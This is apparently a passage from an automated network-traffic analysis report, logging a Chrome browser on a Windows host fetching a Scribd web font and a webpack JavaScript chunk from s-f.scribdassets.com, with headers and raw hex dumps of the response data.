                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 21 33 56 b6 bd 39 be df 33 e6 90 af 88 25 42 d6 52 56 46 b1 0f ce ca 77 f8 9c 11 c2 e8 59 96 d5 54 8c 67 f7 5f 9e 63 6e 84 dd 5a 8c 62 e1 aa 2e 6c ac 7b 8f ae 9b ab aa 76 ae 8e a2 52 02 e4 2d 42 df 2d 4d c3 71 91 8c ab 82 5a c3 3c a1 02 c4 55 7c bf 08 59 13 16 f3 5c 79 c6 d5 b3 e8 d4 5b 19 7a b2 f7 6e 43 85 50 c9 f8 13 88 b2 41 9f 33 a4 8a e1 87 0d 22 fb 01 1c 12 02 82 f3 bd 94 7a cc 67 9b c6 21 a9 38 e8 2d 3e a7 9e 5d 7d ff e8 0d 8b 56 3c cd d0 b4 c9 cf 19 6a 38 9f c1 cc b4 18 ea e3 9f b2 a0 a0 32 4a 1c d3 a2 92 59 dd 06 13 2d 5a 16 82 7f dd 85 3a a7 ca 38 53 69 50 9c 3a 09 d3 73 bb 2e f6 00 ed ac 1d b9 a0 03 4c 7f 02 53 e1 e3 80 4c 75 cb 67 83 fa ef a3 3a 69 45 2f 17 97 7a 99 46 7a de 27 b8 25 d2 06 37 33 e7 cc 7e 23 d3 bb 3d ff 7d 66 7a 20 e3 6e c9 c6
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !3V93%BRVFwYTg_cnZb.l{vR-B-MqZ<U|Y\y[znCPA3"zg!8->]}V<j82JY-Z:8SiP:s.LSLug:iE/zFz'%73~#=}fz n
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 31 61 07 bb d5 4a 4c 14 e3 01 2b 3a 48 dc 10 e7 62 a8 d5 46 a4 1c a8 68 23 07 c5 0a 69 49 ab c0 15 78 e5 d7 ff 22 8f 92 93 07 c9 c2 e5 d3 54 52 40 16 a4 9d 36 cc 31 99 6f 1a 76 ef 2e 46 e7 98 1c 9c c3 ac 30 00 92 8e 3a 64 a7 a6 b0 0a 7b a1 25 28 40 e0 df 04 6f 98 07 5c 1b 8f 20 22 79 4a 0e 95 16 84 cc 9e 3a 0a 9a 2b 1c bd b3 af 58 cc ff fa dc a1 f8 be 52 66 79 79 26 78 b0 03 f6 5a 3c 56 64 df f6 46 c2 de 62 bf 7f 26 b0 d1 06 75 23 00 02 11 ce 26 27 21 f0 e0 c2 c8 eb 77 8a 40 46 3c 7c 3d 04 9d 87 0a 38 c2 f5 a9 fa a7 29 36 45 50 24 63 74 28 92 77 2f 44 ef e5 4d f4 e9 2b c5 8f 97 52 71 9e 02 00 c4 29 bc 30 9c 31 06 80 cc 9d 63 38 38 7d 13 e9 57 bf f5 27 e3 2d 21 60 00 11 05 7d f1 3a f5 f3 1b 8e d0 91 3f 2a 68 71 45 10 31 02 88 cc c5 b9 54 71 a2 1b 3d 9f 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1aJL+:HbFh#iIx"TR@61ov.F0:d{%(@o\ "yJ:+XRfyy&xZ<VdFb&u#&'!w@F<|=8)6EP$ct(w/DM+Rq)01c88}W'-!`}:?*hqE1Tq=n
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: c6 ca eb e9 d9 e9 27 ca c8 3e 41 5d e6 47 30 5e 58 4f 3a 5e 17 34 97 97 25 d7 53 58 98 1f 85 6a 01 29 7a 1d 21 de b9 3f d5 f4 d9 eb 49 9a 51 f0 4e 11 0c 1c f3 c2 10 48 a0 f5 03 1d d3 9a 6e be df 8b d0 2c 81 c4 dc 5b 98 6b 5e 5d 9c 6b ee 2d 36 03 7c 95 3c bd 5a 92 c5 5b b6 2d f3 0b 15 86 d1 92 62 b3 12 43 42 64 32 56 95 17 a5 b2 ab fd 47 6b 29 ce 5a 4b 3f ab 41 a6 8d 07 6a 2a ec 53 5b ce d8 89 0f 51 73 11 9a 92 82 16 a9 82 e3 c4 6e 2a c7 09 b4 cd 3b 4b 4a 0c c9 7b 8f 47 47 1f df ab 4f 6e 2a ee a4 bc 7c 5a 6d 7a 45 45 3a c0 ee a0 bf b9 a0 3f 3e 50 05 05 a9 26 a1 ca 60 8d 80 0f 94 e7 67 94 cd 98 dc a9 d3 42 60 20 25 0d 74 61 bd 61 a6 1c ac 7b c0 01 5a ab a3 53 ca f9 ee 20 ed 9d 40 86 89 a0 e9 72 14 75 18 b6 33 28 34 51 99 d8 d2 91 1e 17 c5 02 84 3a e1 fd 83
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: '>A]G0^XO:^4%SXj)z!?IQNHn,[k^]k-6|<Z[-bCBd2VGk)ZK?Aj*S[Qsn*;KJ{GGOn*|ZmzEE:?>P&`gB` %taa{ZS @ru3(4Q:


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        11192.168.2.1649724151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC638OUTGET /webpack/assets/fonts/source_serif_pro/semibold/source_serif_pro_semibold.latin.f74d6620.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC669INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 20972
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 23 Aug 2024 21:19:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "6eacd53a47836843a14d4d30f0b512c3"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: font/woff2
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Age: 2460820
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740068-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 6964
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522359.387812,VS0,VE0
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 77 4f 46 32 00 01 00 00 00 00 51 ec 00 0e 00 00 00 00 c7 10 00 00 51 8f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 81 18 1b 81 a6 70 1c 91 74 06 60 00 84 16 11 08 0a 81 aa 24 81 87 78 0b 84 78 00 01 36 02 24 03 89 6a 04 20 05 85 02 07 8e 1e 1b 75 b2 15 ca 6d 17 dc 36 00 9e 2f 3b bd e3 87 62 36 c2 76 3b 90 53 eb f1 0d 47 45 6d 26 ad 58 f6 ff f7 04 39 e0 68 c5 df 2a 78 20 52 a3 12 54 75 c7 76 51 1a a6 85 61 b3 8a d2 86 2a e0 9d d9 dd 01 d5 1c 67 fa 8f 1d da 2b 92 41 8a f3 eb 4e 2f f4 24 9b 53 7c 3e d9 f6 0b 4f fa e6 c3 c2 97 d5 27 7e c4 0f ed f1 f2 71 3a 36 69 c5 89 74 99 95 9c dc a2 59 0a 09 37 8e c8 36 89 1d 2c 88 6d 6b 74 06 b8 93 23 12 76 f2 d0 ff 7e ff db 33 e7 d9 37 73 dc 93 26 16 99 48 6a 50 02 21 91 89 84 2c 5a 02 11
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: wOF2QQpt`$xx6$j um6/;b6v;SGEm&X9h*x RTuvQa*g+AN/$S|>O'~q:6itY76,mkt#v~37s&HjP!,Z
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 0d 90 45 f1 2b 35 69 2a 28 99 fa 9e e0 0c d0 30 ae fa 72 44 14 74 58 0e 3e 28 d3 03 e1 1f 20 12 43 41 3d e0 23 f3 e0 16 8d b8 16 1f c6 63 33 4d fa 74 85 31 b3 b2 73 72 f3 0a 08 09 8b 8a d7 fb 3d 10 ea e6 f5 34 21 70 fa 0a ff d6 d5 42 f4 0c c8 9f fe a1 a6 e7 f4 45 e1 a3 b5 65 2a 4e 50 c6 61 e3 46 7f ba 4c 2c 6c 1c 5c 3c 7c 82 d2 45 c4 24 c2 9c 7f f9 7a 12 03 ec be d8 27 de 0b 2f 5a 38 00 dc 7f d3 1d ba 49 17 56 ee 2d 18 8f 80 69 ec 6e 7c d5 39 fa 75 85 f2 3d 43 b6 f1 2f 87 3b 38 2b 73 5a 11 40 18 8e 04 36 ab 36 fd ba 24 db a5 34 d2 28 f2 8f a2 d8 ac 58 93 a9 db 1f 87 e2 b3 eb 50 a3 ef 7f 0d a9 e6 5a e9 7c 6b db 96 3c 97 57 f2 8d 7c 2f 7f 2a 40 cc 3b f9 c7 7b c6 87 78 20 04 2e 3e 9a 88 98 94 92 8a 9a 86 96 8e 99 4f 44 0f 85 7a 2a d2 4b 99 72 fd 0d 30 50 a5
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: E+5i*(0rDtX>( CA=#c3Mt1sr=4!pBEe*NPaFL,l\<|E$z'/Z8IV-in|9u=C/;8+sZ@66$4(XPZ|k<W|/*@;{x .>ODz*Kr0P
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: b8 94 7e f9 8e 8d c9 80 9f 8c ed fc f7 25 01 ba b9 cd e7 97 7b 06 00 2e a3 32 82 81 bf 28 a0 03 b7 19 c6 f6 e1 ad 34 bd 86 54 3f e3 7a 37 85 f3 2e 26 97 8f 34 87 03 1e d8 d9 a1 35 df 39 89 74 fa 14 3e 5d a9 21 5a 2b 6c 7e 11 ce 15 e5 46 71 3c 57 a4 a7 b3 5c 58 03 5c 24 e2 75 04 c8 96 47 44 f8 45 96 47 97 47 12 e1 79 d4 e7 03 58 86 11 23 23 20 14 23 22 11 23 25 23 23 25 a7 a0 a4 a2 a6 59 4e 2e 8f 88 ac 27 2a 82 21 23 24 22 26 22 25 21 25 23 a0 a4 26 5b 2e 60 e5 e5 66 62 e4 44 30 b0 d0 d1 d2 41 30 07 dc 75 38 e2 a8 78 73 90 86 95 86 65 66 67 13 66 13 66 13 16 a4 17 e4 11 e2 ea a5 4f eb db 7f 41 fe 39 b8 71 45 33 80 d3 55 f6 9b 07 6b c2 8c 55 77 52 b0 0a ee a5 05 f0 ed 02 5c b0 c0 06 19 72 65 d9 cd a0 53 65 a6 41 a3 a3 94 1e 50 e8 17 2e fe d1 58 fd 47 cc fb
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ~%{.2(4T?z7.&459t>]!Z+l~Fq<W\X\$uGDEGGyX## #"#%##%YN.'*!#$"&"%!%#&[.`fbD0A0u8xsefgffOA9qE3UkUwR\reSeAP.XG
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 6f 0e b3 6a 4b f7 76 f4 31 b0 bb 20 69 e1 ed 9e 2e 60 dc 66 74 eb bb bb 5e 21 77 6c 7d e1 9f f0 72 6d 64 df 5d 1f 7d 23 74 ec a5 5d 9b f4 43 4e 2e 0f 3d 22 07 f3 4f e3 2c 59 f0 73 c8 1a 6b 68 e3 a0 c1 69 37 52 1d ba b8 5a 51 7d 87 33 bf c8 03 8d 8f cc 87 9b db a7 e2 b4 39 9a e5 30 55 46 8b 71 01 23 11 51 35 ff 1d 86 5f b2 0f e0 06 af 5a 95 87 7c c4 69 ac 92 7c 4c ba 58 80 e8 95 0c 47 85 83 e5 fd 46 3d ab c7 08 5a 1f 4a f3 ff f7 a8 92 28 18 06 6a 28 08 8f 04 49 46 46 28 ae 94 48 85 0a 4e 98 12 89 84 70 70 60 14 0a 81 87 87 c4 47 e3 60 30 28 02 02 5c 42 42 3c 22 22 1c 62 62 7c 12 12 34 19 19 5a b6 6c 84 1c 39 90 5c 29 84 02 05 48 3d 14 e1 e8 a5 17 be de 4a d0 4a 95 22 54 a8 80 21 d8 63 8c a4 7c e3 31 59 fb c6 d0 e2 59 1e 46 1c 20 35 6e 26 55 26 e3 4f 53 12
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ojKv1 i.`ft^!wl}rmd]}#t]CN.="O,Yskhi7RZQ}390UFq#Q5_Z|i|LXGF=ZJ(j(IFF(HNpp`G`0(\BB<""bb|4Zl9\)H=JJ"T!c|1YYF 5n&U&OS
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: d5 c4 a0 ea f0 27 d2 15 20 af b6 2a 07 05 dc b1 72 5b 17 d8 cc 5a df d6 5d 54 38 3e 39 88 9a 9b 75 36 3f 7e d0 13 41 dc d4 1c a2 82 ba 74 2f 34 03 60 85 e1 89 39 8a 50 ce 42 52 ae 73 40 0a 48 68 de 06 9b 8f de 35 60 46 c4 48 ad 11 b5 43 c0 d3 9d 45 2c f0 13 64 1f 40 15 88 32 e0 f3 57 5d 15 81 b8 e2 63 9b 76 da b6 ec 7c d0 41 84 21 fc 93 0c 09 3e b6 d6 c6 62 7f 82 af 3a 41 45 d0 30 03 6d c7 0e 4f fc a2 f8 ac 31 8e a7 c8 1a 47 a5 45 34 f5 0d 60 ef 23 cf bd 3c af ca 4c 0e 3c 8a 5b b8 24 b3 fb ce b5 f7 89 31 6e bb 62 00 86 e5 29 8a 5c b9 dc b8 f4 b8 3b b1 e2 73 31 c8 c0 8f 55 87 9a 27 63 47 c8 25 d7 32 c0 b1 ac 67 f5 ad d7 31 ca d2 f1 71 6c 33 c3 e1 98 01 e4 d3 4a 19 46 f5 a7 cd 59 0f 62 ef 23 1b f0 30 9e 2a a3 bb a9 12 50 c3 ad a3 fe 95 dd 80 a4 8c 35 37 b7
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ' *r[Z]T8>9u6?~At/4`9PBRs@Hh5`FHCE,d@2W]cv|A!>b:AE0mO1GE4`#<L<[$1nb)\;s1U'cG%2g1ql3JFYb#0*P57
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 5c 70 53 d6 8f 48 d6 96 0a 08 fb ed c8 98 90 d4 93 4b 41 59 92 10 77 dd 55 2a 0f 2e 53 74 ea 9d 9e b7 81 a6 ee 7e d4 9b 65 84 26 4e 89 2c 2e 29 23 80 1c 0d 09 48 8c 6c 74 96 30 c1 9a 32 c1 dc 1b b4 1c 6c 62 3f 5f 9c b0 14 a2 72 32 c5 25 b9 3e e0 c0 77 f5 05 ae 57 c7 37 5b 01 57 f4 fe 07 79 a6 4c ab bc 22 f2 23 a3 21 9c 78 b3 64 57 a8 a7 5f 9c 76 3c 8a f4 69 b3 73 fc 5d 3e e9 4a f4 f0 a3 c6 18 54 ad c8 d9 53 e0 b4 92 78 e2 4e 24 a8 7f d6 88 03 be 32 90 08 5f 2b 46 b9 f0 a2 bb 38 0c e6 e7 6d f0 52 38 c7 be c1 7b a8 77 56 93 0f 8f 61 fd d9 7f 5e e3 a0 7a dc af 92 eb af e9 2c 3f 32 0a 75 70 a6 eb 11 8a 40 fd 54 fb dc 5e eb 6c f4 19 46 de fe 87 35 01 5b 12 81 e9 ea 4d a5 0c 98 0e 62 92 0a 8a 28 9b a2 3a d6 92 d8 6e f8 c0 f0 01 cb a6 95 a0 c7 9f 78 9b b5 b5 de
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: \pSHKAYwU*.St~e&N,.)#Hlt02lb?_r2%>wW7[WyL"#!xdW_v<is]>JTSxN$2_+F8mR8{wVa^z,?2up@T^lF5[Mb(:nx
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: be bd be 1e 38 55 49 d7 da eb 5b f4 8a ad 4b 60 d6 9e 8d a8 6d d5 a5 8a 01 a8 70 29 4c 0b 35 c4 76 b5 df 3f b1 0a 12 2d fd e0 a3 4f 3e fb e2 ab 6f be fb e1 a7 bf fe f9 e5 b7 3f 26 09 cd a2 95 7b e8 91 c7 9e 78 ea 99 e7 5e 78 e9 95 77 de 7b ed 8d 0a f5 85 2f 61 84 05 56 82 9f cc be 6a da 05 97 09 0c ad d0 67 c0 b5 ac 10 08 28 4b ca d4 00 12 33 54 42 be f1 0b e2 b6 da 4a 45 04 ab b0 77 7d 7d a0 28 44 82 24 c3 14 74 86 5d b9 64 93 06 07 c6 be eb a1 00 d2 5f 11 33 13 fd 57 d3 6a 56 d9 d4 8f 16 4e 72 c6 cd 4f 1c 78 23 0b 6c ce 45 30 5b cc cb 4a 4e 73 60 9d 29 ad cd 2c eb 34 1b 41 2e ba cc f0 5c 7b 16 04 9a 54 3d 5f ee 2f d9 45 1a ce 71 e5 82 15 a0 f8 b9 41 00 0e df 35 42 56 7c 83 e3 80 7c 79 5d 04 0f ff d2 80 38 5f 38 c6 20 27 70 09 0e c9 c1 98 04 d0 04 0a 00
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 8UI[K`mp)L5v?-O>o?&{x^xw{/aVjg(K3TBJEw}}(D$t]d_3WjVNrOx#lE0[JNs`),4A.\{T=_/EqA5BV||y]8_8 'p
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: dc 43 d6 89 98 04 e4 e5 71 5d 6f f0 6e 58 a0 b7 65 07 20 62 6d 16 c3 be 0d 5f 69 c8 ca 7a ab e9 a3 93 45 ec d2 6d c2 fe 6a 8e 85 aa bd 08 cc 14 44 34 bc 50 e6 dc eb ba c2 f0 6e 8b d6 d3 f8 92 43 45 a0 19 08 8c 99 09 4b 62 7f ac 3c bd 74 5a f4 16 02 6e 4b 3d 7f fa 53 fe 66 91 40 33 cd 72 3e 82 1f 22 83 19 27 05 43 e7 a4 e3 79 bf 17 52 0f e8 0c 61 4f 49 e4 a1 03 08 8e 1a 17 01 61 2f 57 58 34 57 a0 f5 ba c6 7b e1 44 ad ea ae 85 eb 15 f5 a9 8d e8 30 f6 81 57 99 5f 4d c7 d6 07 b1 54 4a 9d bd 6b 3b 16 b0 d6 05 8b e0 ef f3 18 89 37 06 c4 34 8e ba 46 66 2d 5f b1 9b 84 5a 2c 65 e6 17 09 fe 12 97 55 ae 3d 9b 1d 99 03 98 ed 34 5a 4c b9 9f db 68 75 63 21 32 23 5e 28 0d 04 a8 59 73 02 98 d3 75 46 9b c7 81 d5 3b 7d 59 66 53 62 14 4a d9 28 a2 7a ac ee 96 76 ce b8 10 c0
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Cq]onXe bm_izEmjD4PnCEKb<tZnK=Sf@3r>"'CyRaOIa/WX4W{D0W_MTJk;74Ff-_Z,eU=4ZLhuc!2#^(YsuF;}YfSbJ(zv
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 97 55 3d 43 f9 1d 42 17 91 f1 b6 db c6 ee c4 41 ec a6 ac 96 77 57 3e dd bd 6e ed bd 32 8b 55 18 fc 53 bc 7b 56 bd 25 f0 c5 a8 a2 44 c4 4b 15 93 f9 49 f4 22 31 49 2d 0c 31 05 78 3c da 40 a1 a5 16 56 c7 87 ba a9 8c da bf 57 20 84 91 54 fe ee dc 5c 33 db b9 3e 00 db e3 94 bd a9 8b 64 c3 35 b4 23 74 a2 c8 98 ad 33 3b 76 e5 74 f8 23 01 17 72 88 ff ac 85 61 b2 29 08 13 a8 c8 c0 cb 60 99 5a 2d 9e a6 16 fa b0 8e d8 21 17 fd 1e 25 3b 9b ec f3 32 0d e3 9a 33 0e 0b b8 b3 22 16 dc cf a3 74 3f 14 e7 37 33 d4 4f e1 0b 09 79 13 f2 fe 96 85 d2 42 c8 dc 17 b3 2a 06 2a 20 21 fe 07 29 bd d9 58 50 4e 4d b9 2f f0 b7 b0 70 ef 0c 2a 8b e2 74 7d 31 c5 58 95 e1 f8 89 6d a7 e4 62 cf c4 82 df 14 9a 91 1a 0b 27 57 79 7e 64 64 57 ab 83 d6 86 13 89 ad 02 ea 11 28 0c 06 a8 03 07 31 8e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: U=CBAwW>n2US{V%DKI"1I-1x<@VW T\3>d5#t3;vt#ra)`Z-!%;23"t?73OyB** !)XPNM/p*t}1Xmb'Wy~ddW(1
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 45 50 a2 19 cd 06 27 9a 60 31 ec 45 e1 a1 2b 25 d1 81 2e b1 17 d5 cc e9 46 b1 fb f4 04 1b e8 64 3c a8 4d 4e 1a f8 82 7a 46 86 b4 27 08 45 d3 e9 83 5b 40 0a 97 ed 08 ca cc 52 86 88 e8 8a 53 e7 09 07 1d 79 fd d5 d8 0e 8e fb bb 57 21 de f0 b9 ec 26 26 b5 cc 1f 48 c1 e9 65 2c e0 c3 03 31 57 d0 1c 20 60 a1 c0 8f fe 3e e8 4c e5 fc e8 36 e1 e0 77 70 15 6e e9 e1 6b 2d e6 44 98 08 23 89 73 89 ce 4a 31 a8 10 b9 50 70 86 78 bc 32 b8 7c ca 72 ba f2 b5 4a d0 2a ba a5 9f 69 41 9f ff 5b da eb d6 9e 9f a7 ef 66 01 16 5c 89 4b 0f 62 e0 37 97 7e b8 f4 cb 9b cc 31 a3 00 e1 44 f9 10 c2 a5 68 56 7b 3e f8 f6 6a 1a 72 2f 2d ee b2 d6 8b 83 c1 99 26 f8 9f a0 0f 57 a5 99 1e 7f b5 05 5f ad 2d 36 f5 bc 39 01 3e 6b bb 3c 0c d5 92 c2 16 49 b0 5c de 5b ee cb cd e9 83 2d 59 85 85 cd 92
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: EP'`1E+%.Fd<MNzF'E[@RSyW!&&He,1W `>L6wpnk-D#sJ1Ppx2|rJ*iA[f\Kb7~1DhV{>jr/-&W_-69>k<I\[-Y


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        12192.168.2.1649727151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC577OUTGET /webpack/doc_page/245.799c3a.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC686INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 2452573
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 19:31:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "a440e0545e5a5146f10f90df2ea13a56"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740074-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522359.395149,VS0,VE313
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 34 35 5d 2c 7b 34 31 30 33 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 38 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 28 6e 75 6c 6c 3d 3d 74 7c 7c 74 3e 65 2e 6c 65 6e 67 74 68 29 26 26 28 74 3d 65 2e 6c 65 6e 67 74 68 29 3b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 6e 65 77 20 41 72 72 61 79 28 74 29 3b 6e 3c 74 3b 6e 2b 2b 29 72 5b 6e 5d 3d 65 5b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[245],{41033:(e,t,n)=>{e.exports=function(){var e={228:function(e){e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=new Array(t);n<t;n++)r[n]=e[
